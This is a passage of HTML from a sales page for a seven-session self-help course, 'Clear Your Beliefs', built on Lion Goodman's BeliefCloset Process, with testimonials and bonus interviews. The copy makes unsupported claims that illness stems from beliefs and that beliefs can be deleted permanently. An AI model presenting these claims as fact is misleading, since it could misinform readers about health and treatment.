#000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\r\n\r\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\r\n\r\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs.  It takes some work, and it''s <em>very </em>effective.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships. If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?\r\n\r\nHumans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\r\n\r\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="145" height="188" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global 